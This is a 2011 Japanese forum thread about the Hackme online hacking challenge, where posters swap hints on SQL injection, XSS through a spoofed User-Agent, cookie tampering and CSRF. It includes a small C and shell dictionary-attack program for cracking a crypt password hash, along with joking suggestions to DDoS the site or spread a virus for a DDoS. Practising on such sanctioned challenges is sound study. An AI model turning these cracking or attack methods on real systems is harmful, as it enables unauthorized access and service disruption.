【Hackme】ハッキング力検定サイトHackme Lv2
ん
スレ立て乙です。
どうしようもない豚が多すぎる
乙
7 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 14:03:07.74
前スレ
>>990 何正解ばらしちゃってんだよwwwwwwwwwwwwwwwwwwwww
>>7 お前みたいに書いてほしくてネタバレしてるんだから、
スルーしとけよ。
ネタバレマジうぜー
答え見て得意げにしてるやつアホだな
ネタバレしたら代表取締役が怒るぞ
なんかおかしな社長で面白いな でもみんな多少スキルアップというか考える事に対して成長した感が楽しい 俺はガチゲイプログラマだからお前らと成長していきたいんだよね
そろそろ本気出してLv5フルボッコにしないか?
みんなでf5おせばいいとおもうよ
自分でサーバー管理してない人がこのゲームやって何の利益があるんだろう… 他人のサーバーに向けてやったら捕まるし。 かくいう俺もレン鯖だがw
>>12 とっかかりがなさ過ぎてどうしようもない。
Lv4みたいな何かがあれば分かるけども
にしてもログイン画面で他人のログイン履歴見れるのも怖いな
>>前975 IE6だとdocument.locationが動かない。代わりに、location.href。
Lv5クリアしたら称号は情報操作(ウィザード)とか論理崩壊(ロジックシーカー)とかになんの?一方通行みたいな感じで
>>15 無いに等しいが、今のところ発見されている現象。
/Lv5/login or /Lv5/login/ どちらでも動く。
/Lv6/ は /Lv5/ に転送。
他になんかあったっけ? ちょっとずつ、まとめていかないか。
>/Lv5/login or /Lv5/login/ どちらでも動く。 /Lv5/login? でも動くし /Lv5/login?name=hoge&password=fuga でも動く
lv5は時間経過とともに ウィザード -> ハッカー -> 仮ハッカー -> チーター くらいじゃねえの
Twitterから。 @shiracha 白茶利休 0x82はSJISだよね。なんだっけ。。。UTF-8の時。冗長エンコードのやつとか色々あったのは覚えてるんだけど #hackme
ごめん、順番が前後した。 @shiracha 白茶利休 なんかLv5のフォームってUTF-8の不正文字列はそのままvalueに返してくるんだからそれでXSS出来そうな気がする。こういう時ってどうやるんだったっけ・・・・・・。 #hackme
>>22 ネトゲチーターのレベルはLV4程度じゃなくてもっと高いぞw
>>21 それは、Lv4以下でもできたっぽいね。
Lv5 固有と、全体共通で分けてまとめるか。
>>25 チーターのレベルは高くない
レベル高いのはチート方法を確立する奴だけ
末尾に「?」付けても動くのは仕組み的に分かるんだけどねー。 ちなみに Lv5/login// Lv5//login/ は弾かれた。ってことはlogin/以下の何かを利用すると思うんだけど・・・。
LV5解けた バッファオーバフローだ
アクセスバイオレーションですね。わかります。
Lv3のrootパスがMD5でそこから解けねー
>>28 それっぽいの付けてみたが、ダメだった。他になんか無い?
/Lv5/login/.htaccess
/Lv5/login/index.html
/Lv5/login/auth.html
/Lv5/login/join.html
>>32 indexでも動くのは知らなかった。
確かに別のLvだとindexでアクセスできないしなんかあるのかな?
ひっかけじゃないならわざわざindexを用意する意味もわからんし
39 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 14:45:05.15
これさー、本物の脆弱性用意してくんないと、ただのクイズだよな・・・ せめて、Lv2なら本物のDBに通す、Lv4ならBOTが一定時間毎に本当にログオンする、位やってほしい 手法までは、セキュリティをちょっとでもかじった人間なら、これはSQLインジェクションだな、これはXSSだな、 って気づく位おおっぴらなんだから、あとは実際にそれが実行できるかどうかのディティールじゃんか。 そのディティールで嘘があったら、もうただの当てっこクイズだよな・・・
>>33 確か、ハム速のコメ欄にヒントがあったような。
xssじゃなくてsqlやってやれば
これもしかしてNetfire社内のどこかにID書いたメモが貼ってあるんじゃね?
>>39 本物の脆弱性残して本当にハックされて回復できなくなったらどうすんのよ
44 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 14:47:45.99
問題がログインだけってのがおかしいんだな。 Lv2なら、ログインしたはいいけど、存在しないIDかパス使ってるわけだから、 そっからパス変更するなり、DB見て何か貴重な情報抜き出すなり、そこまでやって欲しい
45 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 14:48:57.77
>>43 仮にもセキュリティ会社なんだから、どこまで穴を開ければ、どこまでされるかはわかるでしょ
>>44 あくまでセキュリティ意識の向上の為のサイトなんじゃね?
その要求は避難訓練には本物の火が必要だって言うようなものだと思うけど。
鯖を外部に公開すると、PHPの管理ページとか、MySQLの管理ページとか 一般的には外部に公開しちゃいけないページをひたすらスキャンしてくるbotみたいなのあるじゃん? (普通に設定してれば全部404で返すわけだけど) あれ、どんなツールを使ってるのかしらんが、Lv5に試してみたいな。 だれかツール名わかる人いない?
48 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 14:51:48.61
>>47 AppScanとか?
売り物しか使ったことないや
49 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 14:53:34.04
>>47 あー、でも、BOTアクセスかけると、あっという間にBANされるよ
昔のLv2なんてSQLMap仕掛けただけでBANされた
>>48 売り物なんだ。そうかー。
だれかフリーで類似品知ってる人おらんかね。
winnyでウイルスばらまいて一斉にDDOS攻撃しかけるってのは?
セキュリティ会社なんてカスだってことだけはわかった
>>38 >確かに別のLvだとindexでアクセスできないしなんかあるのかな?
loginより上位ならできるぞ。Lv1/indexからLv5/indexまで全部いける
lv2わかんね
>>53 本当だ。
ってことは違うのは最後の/だけか。
57 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 14:58:23.75
海外のガチハッカー呼んでこようぜ
むかーしのハッキングゲーム思い出したのは俺だけ? (最初に成績簿書き換えたり、最後の方で銀行侵入するやつ)
海外から作りが適当すぎるってそう叩きくらうぞw
Lv5はサーバールームに殴りこみハック
ガチハッカーを呼んでnetfireのホームページがハッキングされるのを見てみたい
さて、ネットファイアに会社訪問&就職してくるかw
lv2教えて
TIE55/09/23がパスワードと思ったけど違ったようね。
そろそろネタバレしてもいいんじゃないか? レベル2が分かったくらいで、次の3が解けんだろww ぜひ、教えてやれ
今見たらLv4が210人もいてワロタw 昨日までは50人くらいしかいなかったのにw
そろそろってなんだよw社内会議かよw
> Congratulations! ... > ミッションクリア!ちょっと簡単でしたかね? どないなっとんねん…
70 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 17:02:38.97
この企画は、この会社にとってプラスになっているんだろうか・・
まだLv7が404のままだが大丈夫なのか?Lv6でエンディングを見られるということなのか?
>>70 知名度が上がればあとはどうにでもなるよ。
いい問題1つ作れば名誉挽回して余りある。
Foxさんお疲れさまでした
Lv4でURLに?が付くのは自分ちのブラウザーがやってることなんだよな? ボタンでGETすると自動的に付くであってる?
>>67 判定基準かえたのもあるんじゃね?
Twitterのpoquitinとか言うのがイタイ
>>24 それは自分が引っかかるだけのXSSじゃないのか?
正しく使っている奴にも見えるところでやらないと
>>20 /Lv6がLv5にリダイレクトされるのはもうLv6が用意されてるからじゃないかな。
Lv4以前でも同じだし。
>>75 ここでLv4の判断基準がネタバレされてたからな
Lv3,Lv4も最初の数十人が本当にクリアした奴らだな
>>75 同意
昨日ならともかく緩くなったLv4であの言い方はないわ
ぐぐって張るだけじゃねーか
>>79 どっちもまだ名前が表示されたころが本物だね
>>79 個人的には変更前のlv4正答が知りたいぜ・・・
今日の変更後は、ダメだったコードであっさり行けちゃったから
クリア時に表示してくれると嬉しかったんだけどなぁ
>>82 このスレを上から全部読めば書いてある
foobarさんのブラウザがポイント
これから始めます
document.location じゃなくて location.href を使うのが正解だったんじゃないの
ついにLv5が一人出たな
/Lv7/は無いから、Lv6が最後なのかしら
にわかがUA変更したままになると、あちこちのサイトにXSS攻撃を仕掛けまくることになるわけだけど、 その責任はどこにあるんだろ。 UAを変更させるゲームを作った会社も幇助な気が
>>88 firefoxならhackme専用のプロファイルを作るべきですね。
Lv5出てねえよw 焦らせるなよwww
>>88 セキュリティは穴を放置してる側の責任。
というか、他人のUAを見られるサイトなんてそうそう無い。
1+1 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 12:46:59.89
ハッキングの実力が試せるサイトHackme
http://hackme.netfire.jp/start 力試しにどうぞ
2 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 12:53:44.86
ん
54 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 14:56:17.41
lv2わかんね
63+1 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 15:24:55.16
lv2教えて
66 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 16:54:06.75
そろそろネタバレしてもいいんじゃないか?
レベル2が分かったくらいで、次の3が解けんだろww
ぜひ、教えてやれ
86+1 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 17:30:53.83
ついにLv5が一人出たな
92 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 17:41:25.35
>>86 騙されたw
>>88 アクセスログで変なUAだとニヤニヤするくらい
>>91 確かに、自分のUAならともかく、他人のUIをリスト表示するなんて聞いたことないな。
>>91 世間では穴から入った奴は不正アクセスで犯罪者というイメージ。
セールスマンが門から入るのはOKでも塀を越えて入ってきたら泥棒扱いされるだろ?
>>95 10年前まではUAをエスケープ処理しないで表示する掲示板が結構残ってたぞ
ほんとに、あの90年代を思わせる古くさい掲示板って減ったよなぁ さみしいなぁ
淘汰された
80年代の疑似パソコン通信風ゲームあるよ。 フロッピーだけど。
teacupとか出てたと思うんだが。 よく少年ナイフのUA出してた
>>97 言われてみれば昔はあったかも。
今考えてみると、何のために表示してたんだって感じですが。
割と最近オミトロン復権してなかった? 理由しらないけど
そろそろ該当してもいい頃だろう お前らどうしたんだよ
>>102 荒し防止だよ。
IPと一緒に表示しておくことで、
悪いことしたらハックして住所氏名年齢職業全部暴き出して社会的に抹殺するぞ!
という脅しが通じた時代。
UAのログでチャットとかおもしろそう
IPでおまえのPCに〜って時代か。懐かしいな。
>>104 あまりにノーヒントすぎて、みんなテンション落ちてるね。
まぁ、実際に10年前というとWinMXが少しずつシェアを伸ばしていた時代で、 WinMX立ち上げている奴を見つけて、脆弱性突いて相手の画面にメッセージを出すぐらいの事はできた。 それでビビって荒しやめた奴もいる。
結局、ほかのレベルとの違いって、URLの末尾に / を付けても動くって事だけ?
今の時代でもワンクリック詐欺にひっかかるやつなんているんだろうか むかしは黒バックに赤字であなたのIPは****です。 〜○回目のご訪問〜ブラウザ情報〜みたいなサイトが結構あったのにな
>>113 あったねw
ああいうのってたいてい大学生が作るんだよねw
115 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 18:17:22.25
ご丁寧に「個人情報を取得中...」なんてgifアニメまで作ったりしてな
IEユーザーをターゲットにしてクリップボードの中身を抜いたりな
ポート0~100まで調べたけど、0と80以外はレスポンスさえ返ってこないよ\(^o^)/httpしかないらしい
>>110 ガチハックするとBANされるんだから、もう少し何とかして欲しいもんだ
まじで、ソーシャルハックなんじゃ無いかと思って、中の人のFacebookのページまで 見たが、ヒントらしきものは無し。
非同期処理に関わる穴って事は無いだろうか。 ボタン連打するとへんな挙動しますみたいな。
サイトが軽くなったようなきがする。 lv4に執着してたヤツが他力合格して満足して去っていったなw
中の人ー、見てるかー!? 見てたらなんか燃料投下してくれー。
ところでどのレベルもCSRF対策してないんだが、これは日本の伝統なのか?
126 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 18:46:50.80
Lv1の答え教えてくれ
ソース買ってこい
qmotas報告乙 中の人の反応無いって事は退社済みかなwww
csrfでlv4までクリアさせてあげれば
130 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 18:51:21.70
131 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 18:52:41.07
>>124 ああ、どっかのサイト見ると、勝手にこのゲームクリアしちゃう攻撃が可能っつってんのか
逆に考えてたわ
別に面白くもないし誰も得しないんだからいいんじゃね?w
>>125 リファラーを変えるか、適当なサイトにログインページをコピー。そこからログイン。
CSRFじゃログイン自体は正しいから何にもならない。せいぜい何も知らない奴にマイピク申請連発させるか「こんにちは!こんにちは!」とか日記に書かせるくらい。
hackmeにどうやってCSRFすんの?
1つのIDで重複ログインできるのもセキュリティー的にどうなんだ
ネタバレでランキングが「総勢~人」にまとめなきゃいけなくなると 法人アカウントの広告効果が無くなっちゃうな 「総勢244人」の横に会社名が出ても何の自慢にもなりゃしない
それはそうとビッグマックがまたまた200円らしいな。
というかここに載ったところで自慢にもならない
>>137 たしかに自慢にゃならないなww ささやかな自己満足って感じか。
Lv5の手掛かりがなさすぎる mod_rewrite?
>>139 特定のソフトウェアの脆弱性に関する問題だとしたらウザすぎるなー。
ようこそ、foobarさん 直近5件のログイン状況 わろたw
>>140 でも他に手掛かりがないんだよね
もうメジャーどころの攻撃手法は2〜4でやってるし
直近50件位だして、ニョキッ ・・・ニョキッ ニョキッ ニョキッ ニョキッ 位みたかったなw
DDoSが残ってるぞ
ddosはもうやられて一回落ちてるじゃないかw
解けなくて切れたアホがやったからBAN祭りになったんだよなw
あれは個人的なやつだったから、今度はLv5挑戦者全員で本当のDDoSをだな・・・
広告用の公式アカウントにさらに料金を上乗せして答えを聞き出すというのはどうか?
149 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 19:44:01.83
DDosでサービス落ちても、ログインは出来んだろww
こういう煮詰まったときはあれしかないな
人__人__人__人__人__人__人__人__人__人__人 Σ て Σ びっくりするほどユートピア! て人__人_ Σ びっくりするほどユートピア! て ⌒Y⌒Y⌒Y) て Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒ _______ |__ ヽ(゜∀゜)ノ |\_〃´ ̄ ̄ ヽ..ヘ( )ミ | |\,.-〜´ ̄ ̄ ω > (∀゜ )ノ \|∫\ _,. - 、_,. - 、 \ ( ヘ) \ \______ _\< \ || ̄ ̄ ̄ ̄ ̄ ̄ ̄ | \||_______ |
lv4クローム不利すぎワロタ
firefox組み勝ち組だな
>>200 以降lv5未満のコメント禁止
いつのまにかレベル5が2人も
うあああああああマジだ「該当者」って奴と「なし」って奴が!
155 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 19:59:35.28
>>154 そのふたりマジで凄いな
最初のユーザー名入れるのって半角英数だけしか受け付けてないのにwww
何の進展も見込めないLv5の画面を最大化して2時間も座り続けてる俺はなんなんだ
>>154 反映されてないとかマジレスするところだった
前スレで誰かが言っていたがマジでソーシャルエンジニアリングなんじゃないのか? スパイ送り込んでゴミ袋に答えを書かせて回収するのが正解じゃないのか?
笑
誰かグルーポンで活躍したハッカーよんで〜
162 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 20:10:38.83
>>159 俺も、もしかしたらソーシャルハックありえるんじゃないかって気がしてきた。
でも、こんな俺らの書き込みを、中の人がニヤニヤしながら見てるんじゃないかって気がしてスッゴい悔しい!
LV5の正解:無い NetFireさえもわからない。
NetFirが何故クリアしていないのか それはクリア出来ないからである
なぜNetFireがクリアしないのか。 NetFireのWAFのセキュリティをアピールしたいから。
lv4以上を募集してる時点で・・・
ということで 終息
復活
中の人は実際に突破しなくても Lv5をクリアしたことにすればいい餌になるよな
170 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 20:56:04.90
該当者なしのまんまじゃ逆にやる気がおきない。 一人でも居ればクリアする方法があるってことになるからだろ。
Lv5もPythonなんだよな?だからその脆弱性つくってのはどうだ gzipに任意のコードを仕込み実行
ここで話してても中の人には見られてるわけだよな・・・
まだ有用な手がかりが全く出てないってどういうことなの
ガチハックでもないゲームなのにとっかかり皆無だから
(Lv5) 該当者なし (Lv4) 称号:仮免許ハッカー の人 総勢280人 (Lv3) 称号:ハッカーのたまご たち 総勢728人
gzipの意味分かってるのか
lv3教えて
>>173 lv4で試した。
同じホストのページの表示がおかしくなる。
そしてほかのホストに入れなくなる。
↓ww
@Netfire_Inc hackmeのランキングに載ってたNetfireのひとって問題の内容知らされずにプレイしてるんですよね?それともただの飾りですか?
@lfji 飾りです。偉い人にはそれがわからんのですよ。
hackmeこれまでのあらすじ lv1 なにもいうことはない lv2 俺は偶然一発だったが、選択次第 lv3 なぜいける lv4 想像の斜め下を行く教科書どおりの手法 lv5 7部海(lv4先行組み)にスルーされるほどの難易度 セキュ板住民が解析に当たっているが、突破者がいないため 正解が用意されているかも謎
Lv2とLv4は有効なIDとパス無いよなきっと
184 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 22:24:13.59
Lv3のPWが知りたい IDはrootは理解した
ジョン・ザ・リッパーさん使え なるべくCUIでな
ネットで攻撃と言えば SQLインジェクション -> Lv2 ディレクトリトラバーサル -> Lv3 XSS -> Lv4 の三つが定番で、もう全部でちゃったな それらの複合技なのかな あとはブルートフ(ry
>>185 ジョン・ザ・リッパーさんでいまやっているんだが時間がかかりすぎるんだ。
--incremental=ALLではないオプションを使うべきなのか?
188 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 22:30:39.49
ジョンさん起動できない件 Windows7です なにがいけないんだろう?
おれ、Lv3クリアしたぞ
ブルートフォースはスマートじゃないってtwitterにnetfireが書いてたからなしとして xssはもうやめてもらいたい問題の出し方自体がlv4みたくわかりにくい
Lv4はUAを偽装すればいいの? そのほかにおどうすればいいんだ?
192 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 22:33:23.89
LV3のPWおしえてケロ・・・
>>187 全然時間かからなかったぞ。
@Celeron 1.8GHz/RAM2GB/XPPrp
辞書つかえば一瞬で探索おわるよ
196 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 22:38:00.29
LV3のJohnの起動方法をw
197 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 22:39:01.88
>>187 そのオプションって、名前から察するに総当たりなんじゃない?
俺はオプション無しで即効だったよ。
>>193 分かりました。気長に待つことにします。
javascript:var t="お";var k="えア";var m="ま";var a="ホ";alert(t+m+k+a);document.write(t+m+k+a); ↑ アドレスバーにコピーすればパス出現
コマンドプロンプトから起動してやんないとハマる時ははまる GUIで失敗するとパスがroot1900と出てくる
ネタバレ含むからsage進行でお願いします。
>>1 前リンク張らないという利巧ぶりを見せてるのに
>>7 ときたら・・・
>>196 プロンプトでおk
203 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 22:42:55.61
>>188 Windows7で普通に起動できたよ。
CUI版使ってる? John-386とか言うやつ。
ツールの使い方からかよw
Lv4は通常POSTなのがGETでも通るのを利用して云々とか考えてたのに違った 何だよこれ・・・
207 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 22:46:28.10
John The GUIの使用方法をおしえて
GUIは不具合ありまくりだからソフトが生成したファイルを削除とか色々出来ないと無理
209 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 22:50:15.69
ならどのスフトをつかえばいいですか 208
Lv4教えて
だからCUI使えとみんな言ってるだろw
unshadowでぐぐって出てきたサイトを参考にしてた。
クリアしたとしてもまた同じようなログイン画面が出てくるだけなのにね
GUIの癖にファイルを選択しても 実行ファイルと同じフォルダに入れないと動かないという今時ありえない仕様で笑ったw
217 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 22:55:01.65
CUIをどうすれば?w
lv5 クリア者でたじゃん
おっ、Lv5クリアでたな
Lv5クリアすげえw
まじかよdotdister 「英数字と下線(_)だけ入力できます」を見て、こっちはどう動こうか悩んでいるというのに
222 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 22:57:43.84
Lv5でるとかwwwwやべぇうぇwwwww んでCUIどうつかうの?w
dotdister お前がハッキングだ!!!!!!!!
Lv4 IDは"英数字と下線(_)"以外でハイフンだけエラーでないな。 これはなんかきっかけになるかも
こういう人がハッカーなんだろうな
それでLv6あるの?ないの? Lv5突破できなくてもなんとなく知りたい
230 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 23:05:25.52
>>222 ツール使わなくても別によくね?
手元にLinuxがあれば、
***ネット上のを参考***
#include <crypt.h>
#include <stdio.h>
int main(int argc, char *argv[])
{
if(argc < 3){
fprintf(stderr, "%s [string] [salt]\n",argv[0]);
exit(1);
}
printf("%s\n", crypt(argv[1], argv[2]));
return 0;
}
これコンパイルして、
# for i in `cat 辞書`;do
./コンパイルした実行ファイル $i salt(サーバからクラックした文字列) >> result.log
done
これで一発で出来るよ。
231 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 23:05:41.80
CUIってなに?そこからだ><
232 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 23:06:28.29
あーリナックスかー!
Lv5なんだろうな またSQLインジェクションなわけないだろうし、 ハイフンが入力できる?だけではどんな脆弱性があるのかさっぱりだわ
234 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 23:08:22.72
リナックスってOSのこと?
うおぉぉ、Lv5まじか!?
とりあえずdotdisterさんおめ! ネタバレしない、いいヒントよろ
dotdister がドヤ顔してるっつーのに、俺らときたらっ! ソーシャルハックとかねーから。
Lv5ちゃんと答えあるんだ しかしすげぇな
239 :
225 :2011/02/25(金) 23:16:05.52
>>233 あ、そうです。Lv5ですねw
しかし、わからんなー。
Twitterの自己紹介を見る限り、セキュリティ専門家って訳じゃなさそうだ。 つーことは、Lv5 攻略の道具はすでに俺たち手にしてるって事だよな。
241 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 23:18:41.82
Lv3だれかCUIのやりかた一通りかいてください><
dotdister のブログ見てきたが、「多分、最初にLv4突破してた数人が本当にすごい人。」だって。 Lv5 意外な盲点があるんじゃないか?
>>241 ググれば使い方くらいいくらでもあるだろう
GUIでも使えないわけではないし
どんだけ乞食なんだよw
dotdisterはセキュ板で真相にたどり着いてからlv4クリアしてるのか
Twitter で「2chからいらっしゃった方もこんにちは。」つってるんで、間違いなくこのスレを見てる。
-はLv2で使用済みだろ?
248 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 23:34:39.20
脱出成功者1号か
>>229 …/Lv6/が404ではないからあるはずだが、実際どうなんだろうな
lv5は今までの方向性からみて2択なのは大体想像ついた。 だが、コードの書けない俺には可能性の低い選択肢しか選べない オワタ
Lv6無いんじゃね?ランキングLv5までしか無いし
dotdisterはスタッフロールが流れたかどうかくらい言ってみてはどうよ?
253 :
名無しさん@お腹いっぱい。 :2011/02/25(金) 23:58:36.16
大きそうなフォントで、「おっ!1文字ずつ色変えてるのか!」と小躍りして ブラウザで見てみたら、Googleのロゴだった…
情報の学生さんか。 そういう子の方がキチンと基礎理解してるんだろうか。
>>253 さんざんLv5無理とか言われてたんだから、それくらい良いだろw
まじでソーシャルハッキングなんじゃないかって気がしてきた。 色々試してみる。
ずいぶん短時間で突破してるんだな
2ちゃんねるってこわいところでつね
にちゃんねるにあくせすすると、はっきんぐされるんだって!
263 :
名無しさん@お腹いっぱい。 :2011/02/26(土) 00:04:40.87
なんかヒントほしいなぁ >Lv5 ハッカーの称号はいいから答えを知りたい
Lv5は様子見してた奴が多そうだから、ここから一気に増えていくだろうな
>>253 おまいがハックしたらこれ見よがしに自慢するんだろ?w
これは素直に自慢していいだろ 俺でも自慢するわwww
明日本気出す。 てか、lv5以下全部途中式晒されててフイタお
268 :
sage :2011/02/26(土) 00:10:01.08
よくわからんがすごい人が現れたとのことで記念パピコ とりあえずおめでとさん
どうでもいいけど、仮免許"ハッカーの人"って違和感あるな たまご"たち"だけ複数形なのも気になる
272 :
名無しさん@お腹いっぱい。 :2011/02/26(土) 00:26:50.60
Lv.5の流れのところ申し訳ないんだけど Lv.2以降ってプログラミング知識皆無だと自力では無理?
CSRF使えたから「mixi IDでログイン!」の要領でパス抜くシナリオかと思ったけど、違うっぽい Lv4みたいな感じで俺鯖の存在をアピールすればとか思ったけど、にょき?は無かった つーか今考えても「mixi IDでログイン」っておかしくね?
>>271 つまり、Lv4以下はどうでもいいって事を暗示しているわけか
>>272 ググればおk
つーか真性ハッカー集団だって仲間内で情報交換するだろうから、このスレもフル活用するのが正規ルート
>>272 Lv3までは必要ない
Lv4はほんのちょっと必要
Lv5は哀しいかなわからない!
そうなのか・・・ SQLうんぬんだけググってとりかかってみます
mixiIDはあるのに意外とpixivIDでログインはないな pixivIDはフィッシングしても旨味がないからか?
お、とうとうレベル5に2人目が
目星は付いたけど幅が広すぎるなー
angry birds 13-9が解けん
/Lv5/login でも /Lv5/login/ でもアクセスできるのって どうやってるの? 同じ名前のファイルとディレクトリって作れなくない? あんまりクリアに関係ない低レベル質問なんだろうけど 気になる
Lv4 の SID までわかった・・・が、 それをどうすればいいかわからんw 基礎が抜け落ちてると、このLvで詰まるのか・・・
>> 286 SIDの使い方がわからないでなぜそこまで行ける?
>>286 クッキー改竄は一般人にとっては基礎じゃないでしょ
普通にググってやればよいかと
つか前スレに丁寧な説明あるけど
>>285 たぶんpython版GAEのワイルドカードの書き方次第だと思う。
だから、あまり考えずプログラミングしてもあのような仕様になることもある。
セキュリティ上問題ない。
>>285 は自分がいるページのアドレスの末尾を
/のありなしで試してみよう。
>>291 しかし、これは拡張子の無いページというか
ファイルを指してるアドレスじゃないよな
1日待ったけどレベル5の情報さっぱりじゃないか
必ずしもloginていうファイルやディレクトリがあるわけじゃないよ URLのマッピングでどうにでもできる
lv5の検討がついてきた・・・ わかったところでその先ができるかどうか・・・
297 :
285 :2011/02/26(土) 01:22:12.12
そっか。サーバの管理は仕事でちょっと やらされてるけど、正直GAEとかURLの マッピング?とか全然わからん。 Lv5だけ違うってことはそのへんを 理解しないといかんのかしら
>>296 それはヒントを手に入れたということかな?
唯一の正解者が黙ってくれてるのにヒントねだるとか無いわー せめてTOP20ぐらいまではヒント無しで解けた人が欲しいじゃないか
>>289 Lv4クリアできた = の意味を取り違えてたw
Lv5 のせいで寝れない。どうにかして・・・。
Lv4はやり方がわかってるのにクリアできなくてモヤモヤしたけど Lv5は見当すらつかないから全然モヤモヤしないわw
304 :
296 :2011/02/26(土) 02:02:24.53
ヒントねぇ・・・めちゃくちゃ遠いヒントなら上げる。 つ「名前」 あっているかも定かでないけどな。 ためしにlv4でやってみたら同じ衝動だから微妙・・・ ちなみにlv3でlv4を想定した俺だからなw
>>304 もしかして同じこと考えてるかも。
でも、色々試したけどダメだったんだよなー。
こら、だれだ
500 error lolz
リアルハック
hackmeなんて挑発するから…
310 :
296 :2011/02/26(土) 02:28:28.83
うわ・・・ 俺が送信してからかも・・・・・・・・・・・・・・・・
ガチでハックされてる?
500ではいれねーよ。 だれだよ DDoSコ ドドスコやってるやつ。
なおった
>>312 lv4,lv3が増大しているようだ
ランキングはそのため
つーかLv3のshadow消されてるし。。さっさとatackしときゃよかった。 面倒だな。。
>> 313 なおったな。俺が文句書いたから?(なわけねぇー
ココ見て数百人ぐらいが同時にLV3、LV4なったのが原因だな。 ほんと、セキュ板の弊害だよ。 ココ年齢層落ちた?
つーかネタバレなんて遅かれ早かれ出てくるのは最初から想定できることだろうに 変更加えたところでいたちごっこにしかならんだろ
今500になったのとLv3,4が増えたのと なんの関係があるんだよw
>>320 見つからん。。置いてあるパスが変わったんだろうが、ネタが分かってていろいろ漁るのってクソつまらんな。
(Lv5) dotdister 称号:ハッカー (Lv4) 称号:仮免許ハッカー の人 総勢328人 (Lv3) 称号:ハッカーのたまご たち 総勢766人
>>326 ちげーよ。バカどもが晒しまくる前に分かってたんだよ。
atack面倒だから後日やろうと思って今日みたらこのザマだっつってんの。
>>324 空き巣に入るのに鍵を開けただけで成功したつもりか?
金庫のありかを調べるのも、金庫の錠を外すのも空き巣のうちだ
掲示板だからいずれネタバレ・・・ 見ないに越したことはないw
あるじゃん 今分からないのなら結局分かってないってことだよ
>>329 そうだね。確かにそのとおりだ。それは理解した。
本当にハッカーの才能がある奴なんてここにはいないだろうけどね。
本当のハッカーが今頃遊んでるとしたらCTFだろ
見つかった。Linux管理とかやっとらんと厳しいね。いろいろ勉強になった。
それより、もうすぐ3DS発売だろ。本当のハッカーなら今頃ヨドバシとかに並んでるだろ。
Lv4になった
CSS見てるとinput[type='file']ってのがあるんだけどこれLv5までの問題で使ってないよね? これってファイルアップロードでインジェクションする系なのかなとか思ったりするんだけど・・・ name=が分かんない
Lv4なんかむかつくなぁ。 なんだよこれ。いろいろ書いても勝手にガードされるけど特定パターンだけ別処理にしやがるとか、本当にクラックする場合とぜんぜん違うじゃん。 なにが「盗むのに成功しました」だよ。 ヒントのつもりか?ふざけるな あったまきた。バカバカしい オナニーして寝る。
直近のログイン状況も毎回同じでリアルさがぜんぜんない。つまらなすぎ
つーか他人のUAさらすバカサイトがどこにあるよ?
「仮免許ハッカー」です。なかなか。 やりますね。自分でわかってクリアしたのなら、優秀なハッカーになれるかもしれません。 ワロス
Lv5はワッフルワッフル作戦だな
lv5がまったくわからん PUT,DELETEやらなんやら enctypeのmime錯覚やらなんやら 色々してるのに全く以て駄目 レベル上がりすぎ! 中の人はヒントよこせー!
何をどう勘違いしたかしらんが、CSSは各レベル共通だよ。
横からだがそういうのは違うんだって
restfulな設計だそういうふうになるわけ
http://hackme.netfire.jp/Lv5 と
http://hackme.netfire.jp/Lv5/ の違いは
前者はファイルを探し、後者はLv5以下のコントローラ(indexとかね)を探す
詳しく言うと
ファイルを探してもない↓
同ディレクトリのコントローラも無い↓
無い無いばっかじゃ意味がなーいだから404
もしコントローラが見つかってもアクション(indexとかlogin)がみつかんないときは404(Webサービスによっては標準のアクションを表示する事もある)
だからそんなところを追ってもなーんの意味もないわけ
lv5やるからには一般的な基礎知識は持ち合わせとけよ…
>>351 何を当たり前のことを偉そうに言っているわりには
論点を勘違いしている?
Lv1-4/login/は通らないのに
Lv5/login/は通るのはなんでかな?って話でしょ。
この違いを追ってもなーんの意味もないとは何故言い切れる?
>>352 あんたさー
mvc系アプリの一つでもつくったことあんの?
その様子からして全くないだろ
Lv5は実ディレクトリ又はコントローラアクションなわけ
意味わかる?わかんねぇだろうなぁー
ディレクトリが違えばコールされるコントローラは違う
アクションが違えばコール可能なコンテキストが違う
ここまでいって無駄な理由がわからないんなら
お前は今までのレベルをチーとしてきたチーと野郎だっつーこった
ここまで俺の自演
升野郎:(ギクッ)
つまりLv4以前とは異なるフレームワークで作られていると?
>>353 〜アクションが違えばコール可能なコンテキストが違う」
までは理解できてると思うけど、そこから考えるのが
無駄な理由はわからない。ヒマだったら教えて欲しい。
mvc系アプリつくったことはない、というかアプリなんか
